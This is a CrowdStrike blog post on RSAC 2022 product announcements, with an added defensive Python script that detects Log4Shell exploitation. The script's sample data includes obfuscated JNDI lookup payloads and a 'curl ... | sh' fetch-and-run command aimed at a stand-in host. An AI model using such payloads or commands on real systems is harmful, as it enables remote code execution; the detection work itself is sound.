RSAC 2022: CrowdStrike Innovations that Prioritize Data

It’s been several years since we’ve been at the RSA Conference in person and having face-to-face interaction is invaluable — the energy here is palpable. The theme for RSAC 2022 is “transform.” It's a fitting theme given how much has changed in the cybersecurity world in the last few years. The move to support remote workers, the massive adoption of cloud workloads, and the proliferation of devices and assets connected to corporate networks have merged to create a massive attack surface that adversaries seek to exploit. These broad trends have also generated vast amounts of data that create unique opportunities for organizations to gain deeper observability and understanding of how their environments operate.

At CrowdStrike, we embrace the concept of transformation and continue to build technology that transforms the way security is delivered and experienced by customers. We want to empower our customers to use data to make actionable decisions faster. In the current landscape, understanding data and quickly acting on it is the difference between being breached or not.

This drive for innovation and transformation is demonstrated in two big announcements CrowdStrike is making today at RSAC. The first is new automation capabilities and deeper data integrations in CROWDSTRIKE FALCON® XDR to supercharge threat detection, investigation, response and hunting. The second is Humio for Falcon, a new capability that extends retention of CrowdStrike Falcon® telemetry to one year or longer, enhancing threat analytics, threat hunting and compliance.

Expanding Our Vision of CrowdXDR Alliance with New Partners

Third-party data ingestion is critical for driving outcomes in extended detection and response (XDR). The ingestion process can be complex, varying by vendor platform and depending on each customer's environment configuration. This is why CrowdStrike continues to expand third-party support for the CrowdXDR Alliance, which delivers a standardized schema for data sharing to enrich XDR detections.

This morning, CrowdStrike announced several exciting developments that further solidify our position as a leader in XDR. The first is the expansion of our CrowdXDR Alliance to include key strategic partners, including:
  • Menlo Security: web and email security
  • Ping Identity: identity and access management
  • Vectra: network detection and response
Together, the CrowdXDR Alliance will extend the capabilities of CROWDSTRIKE FALCON® XDR to accelerate triage and investigation for our customers, and automate responses across endpoint, cloud, identity management, network and web security.

By extending visibility and control into identities, network, cloud, email and applications, customers will have the flexibility and extension options needed based on their security technology stack. These new partnerships will also empower security teams to identify and hunt for threats at an increased speed and scale, all while providing powerful and relevant insights using data sources that extend the power of endpoint detection and response (EDR) beyond endpoints.

CROWDSTRIKE FALCON® XDR Automates Incident Response for Faster Detection and Remediation

Additionally, we have invested in our CROWDSTRIKE FALCON® XDR tech for organizations seeking a native approach by adding new capabilities that speed up detections, including:
  • Falcon Fusion workflows based on XDR detections: Our customers can now automate incident response workflows with Falcon Fusion, CrowdStrike’s security orchestration, automation and response (SOAR) framework, which is fully integrated with CROWDSTRIKE FALCON® XDR. Falcon Fusion now automates numerous workflows directly from a CROWDSTRIKE FALCON® XDR detection, including:
    • Ticket creation through ServiceNow, a CrowdXDR Alliance partner.
    • Notifications through email, Slack or webhook.
    • Updates to incident details, from status changes to team assignments and comments.
  • XDR detections event timeline: We've accelerated triage and investigation with a timeline view that displays the key events of a detection in chronological order, making it easy to see how the activity progressed.
  • Graph visualization of custom XDR detections: Customers can create custom XDR detections from queries they've written to hunt for threats in their environment. The CROWDSTRIKE FALCON® XDR graph explorer visualizes how the events and entities in a custom XDR detection are related, so security analysts can rapidly orient themselves and explore connections in cross-domain data.

Providing immediate customer value and helping to solve customers' biggest security problems is at the heart of everything we do at CrowdStrike, and our technology has been built around that goal from its foundation. One of these problems, customers have told us, is the struggle to make sense of the sheer volume and complexity of log data and telemetry.

The CrowdXDR Alliance is critical for this very reason: it lets customers enrich the data we already have with third-party data, creating a detailed storyline of how an attack develops and progresses from detection to remediation. We have continued to invest in enriching endpoint data by adding visibility and telemetry from all workloads, regardless of where they run: on premises, in the cloud or in a container.

As we know well by now, good XDR starts with good EDR, and CrowdStrike's EDR is unparalleled in the market. Unlike other vendors that claim to "be XDR" without providing any framework for it or any semblance of a robust EDR strategy, CrowdStrike's strategy has been clear from the beginning: bring the right information into the Falcon platform at the right time to enrich our EDR telemetry. This allows us to make actionable decisions about real-world scenarios, which is incredibly impactful for security operations teams and CISOs who live and die by the data.

Data Storage and Management at Scale: Humio for Falcon

We also announced a new capability today, Humio for Falcon, which gives security teams an incredibly cost-effective way to store and manage data.

Humio for Falcon gives customers extended retention of CrowdStrike Falcon®'s enriched security telemetry for one year or longer. Security teams have been asking for contextual data that provides timely and valuable insights across their IT environments. Humio for Falcon not only helps organizations meet compliance requirements but also informs threat analytics and threat hunting. With Humio for Falcon, customers have a cost-effective and easy way to search years' worth of their EDR data. We have heard time and again from customers using competing products that they are simply paying too much for this type of service and that they need to log more data, not less. This is all the more timely in the wake of widespread issues such as Log4Shell.

In fact, in the wake of Log4Shell, customers around the world told us that of all the technologies in their environment, the de facto go-to was the Falcon platform together with our Humio technology. With that combination, customers could quickly sweep their environment for Log4Shell activity and get a view across a year's worth of data within seconds. These issues affect an organization's bottom line, so every second counts, and that is the power of Humio for Falcon.

Humio for Falcon brings together the CrowdStrike Falcon® platform with our Humio offering, which expands our XDR capabilities by ingesting and correlating data from any log, application or feed to deliver actionable insights and real-time protection. Customers get data ingestion that is faster, more flexible and less costly, together with deep, contextual analytics on massive amounts of log data. With longer data retention, security teams can spot potential threats in their environments sooner and run fast searches across log data, enabling threat hunting and troubleshooting at scale.

Customers can feed Falcon platform data directly into Humio with the Falcon Data Replicator (FDR). That data is immediately searchable and can be cross-referenced with the other data sources already in Humio. By analyzing multiple log sources as part of a detection, customers can narrow the scope of the detection to match a specific adversary technique or behavior, resulting in fewer false positives. Other benefits include:
  • Reduced cost with longer data retention: With Humio's scalable storage and advanced compression, customers can keep Falcon platform data in Humio for one year or longer. That depth of historical data supports complete and accurate investigations, which makes detection and remediation faster, more focused and more cost-effective.
  • Fast and custom search: Humio's feature-rich query language and index-free search let customers ask any question of their Falcon platform data and get immediate answers in new UI dashboards. Customers can build queries for an exact business scenario and generate new insights from their Falcon platform data.
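
As an added example (not code from the original post and not CrowdStrike's own tooling), here is the kind of cross-source sweep the paragraph above describes, in Python over constructed telemetry: FDR-style ProcessRollup2 events and a made-up web-server access log. The event field names (event_simpleName, aid, ComputerName, timestamp in epoch milliseconds, ParentBaseFileName, ImageFileName, CommandLine) follow the FDR ProcessRollup2 event as an assumption; the hosts, timestamps, addresses, the five-minute window and the list of suspicious child processes are invented for the example. The point is the narrowing that correlating two sources gives you: a host is reported as likely exploited only when a JNDI lookup string arrived in a request and, shortly afterwards, the Java process on that host spawned a shell or downloader. A JNDI string alone (scanner noise) is recorded as a probe, and a Java-spawned shell with no preceding probe is not reported at all, which is exactly the false positive a single-source "java spawns sh" rule would raise.

```python
"""Sweep EDR process telemetry and web access logs for Log4Shell activity.

Added example: all data below is constructed, not real Falcon or FDR output.
"""
import json
import re
from collections import defaultdict

# Constructed FDR-style events as newline-delimited JSON. Field names follow the
# FDR ProcessRollup2 event (assumption); every value is made up for this example.
FDR_EVENTS = """\
{"event_simpleName":"ProcessRollup2","aid":"a1","ComputerName":"web-01","timestamp":"1639180001000","ParentBaseFileName":"java","ImageFileName":"/bin/sh","CommandLine":"sh -c curl http://203.0.113.9/x.sh | sh"}
{"event_simpleName":"DnsRequest","aid":"a1","ComputerName":"web-01","timestamp":"1639180000500","DomainName":"ldap.example"}
{"event_simpleName":"ProcessRollup2","aid":"a2","ComputerName":"web-02","timestamp":"1639180002000","ParentBaseFileName":"systemd","ImageFileName":"/usr/bin/java","CommandLine":"java -jar app.jar"}
{"event_simpleName":"ProcessRollup2","aid":"a3","ComputerName":"web-03","timestamp":"1639190000000","ParentBaseFileName":"java","ImageFileName":"/bin/sh","CommandLine":"sh -c ./rotate-logs.sh"}
"""

# Constructed access log: host, epoch seconds, request line, User-Agent (tab-separated).
ACCESS_LOG = """\
web-01\t1639180000\tGET /login HTTP/1.1\t${jndi:ldap://203.0.113.9:1389/a}
web-02\t1639180001\tGET / HTTP/1.1\t${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}
web-03\t1639100000\tGET /health HTTP/1.1\tcurl/7.79.1
"""

WINDOW_S = 300  # post-exploitation must follow the probe within 5 minutes (assumption)
SUSPICIOUS_CHILDREN = {"sh", "bash", "curl", "wget", "cmd.exe", "powershell.exe"}

# ${lower:x} / ${upper:x} wrappers attackers use to hide the literal "jndi" from naive matching
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}])\}", re.IGNORECASE)


def normalise(text):
    """Unwrap nested ${lower:..}/${upper:..} lookups and lower-case the result."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
    return text.lower()


def has_jndi(text):
    """True when the (de-obfuscated) text contains a JNDI lookup."""
    return "${jndi:" in normalise(text)


def parse_probes(access_log):
    """host -> list of epoch seconds at which a JNDI lookup arrived in a request."""
    probes = defaultdict(list)
    for line in access_log.splitlines():
        host, ts, request, user_agent = line.split("\t")
        if has_jndi(request) or has_jndi(user_agent):
            probes[host].append(int(ts))
    return probes


def parse_spawns(fdr_ndjson):
    """host -> list of (epoch seconds, command line) for shells/downloaders spawned by java."""
    spawns = defaultdict(list)
    for line in fdr_ndjson.splitlines():
        event = json.loads(line)
        if event.get("event_simpleName") != "ProcessRollup2":
            continue
        child = re.split(r"[\\/]", event["ImageFileName"])[-1].lower()
        if event.get("ParentBaseFileName", "").lower() == "java" and child in SUSPICIOUS_CHILDREN:
            spawns[event["ComputerName"]].append((int(event["timestamp"]) // 1000, event["CommandLine"]))
    return spawns


def sweep(access_log, fdr_ndjson, window_s=WINDOW_S):
    """Correlate the two sources. Returns host -> (verdict, [(epoch seconds, command line), ...]).

    Hosts with no probe are not returned, even if java spawned a shell there.
    """
    probes = parse_probes(access_log)
    spawns = parse_spawns(fdr_ndjson)
    verdicts = {}
    for host, probe_times in probes.items():
        hits = [(t, cmd) for t, cmd in spawns.get(host, [])
                if any(0 <= t - p <= window_s for p in probe_times)]
        verdicts[host] = ("likely_exploited", hits) if hits else ("probe_only", [])
    return verdicts


if __name__ == "__main__":
    for host, (verdict, evidence) in sorted(sweep(ACCESS_LOG, FDR_EVENTS).items()):
        print(host, verdict, evidence)
```

Run as-is, the sweep reports web-01 as likely exploited (probe followed one second later by java spawning a shell that pulls a script), web-02 as probe only (the obfuscated JNDI string arrived but nothing followed), and says nothing about web-03, whose java-spawned shell is a scheduled log rotation with no probe anywhere near it. In a real deployment the two inputs would be the FDR feed and the web logs already in Humio, and the window and child-process list would be tuned to the environment.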

CrowdStrike’s fundamental technology advantage is that we are relentlessly customer-obsessed. We want to solve the hard problems that are of the most importance to our customers and our tech stack delivers on the promise of stopping breaches. We have created a once-in-a-generation cloud platform for cybersecurity that solves a growing list of customer needs, all from a single agent, providing durable growth for many years to come.

Join CrowdStrike at RSAC

If you’re attending RSAC this year, we encourage you to stop by booth N-6155 for a conversation, live demos or to participate in our adversary training. CrowdStrike will also be hosting a number of keynotes and presentations with a focus on the adversary and how they’re looking to exploit cloud technology and customer environments.

Here are a few things to look forward to this week:

KEYNOTE: Hacking Exposed: Next-Generation Tactics, Techniques and Procedures
  • Date: Thursday, June 9, 9:40-10:30 a.m. PT
  • I will be joined on stage by CrowdStrike CEO George Kurtz to demonstrate how adversaries seek to exploit cloud environments by breaking down cr8escape, a new vulnerability discovered by the CrowdStrike Cloud Threat Research team that could allow an attacker to escape from a Kubernetes container, gain root access to the host and be able to move anywhere in the cluster.

SESSION: Confessions of a Sandbox: How AI Is Disrupting Automated Threat Analysis
  • Date: Tuesday, June 7, 1:15-2:05 p.m. PT
  • Join CrowdStrikers Marian Radu (Senior Director, Data Science) and Liviu Arsene (Director of Threat Research and Reporting) for a discussion on the role of artificial intelligence (AI) in automating threat analysis.

SESSION: Extend EDR Visibility by Logging Everything: Demo with Free Integrations
  • Date: Thursday, June 9, 10:50-11:40 a.m. PT
  • Adam Hogan, CrowdStrike’s SE Director for Humio, will show why log management can be a powerful tool for investigating incidents.
